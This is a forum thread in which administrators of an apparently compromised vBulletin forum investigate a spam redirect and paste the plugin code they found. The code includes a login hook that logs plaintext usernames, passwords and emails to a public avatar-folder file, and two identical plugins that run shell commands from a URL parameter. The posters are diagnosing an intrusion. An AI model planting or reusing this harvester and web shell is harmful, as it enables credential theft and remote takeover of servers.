MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.
Here are the codes:
global_rewrite:
$show['nopasswordempty'] = TRUE;
login_rewrite:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
The Federal plugins are still on. Here are their codes:
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
and
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.
Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.
11-28-2016, 05:03 PM
Hybrid Mode
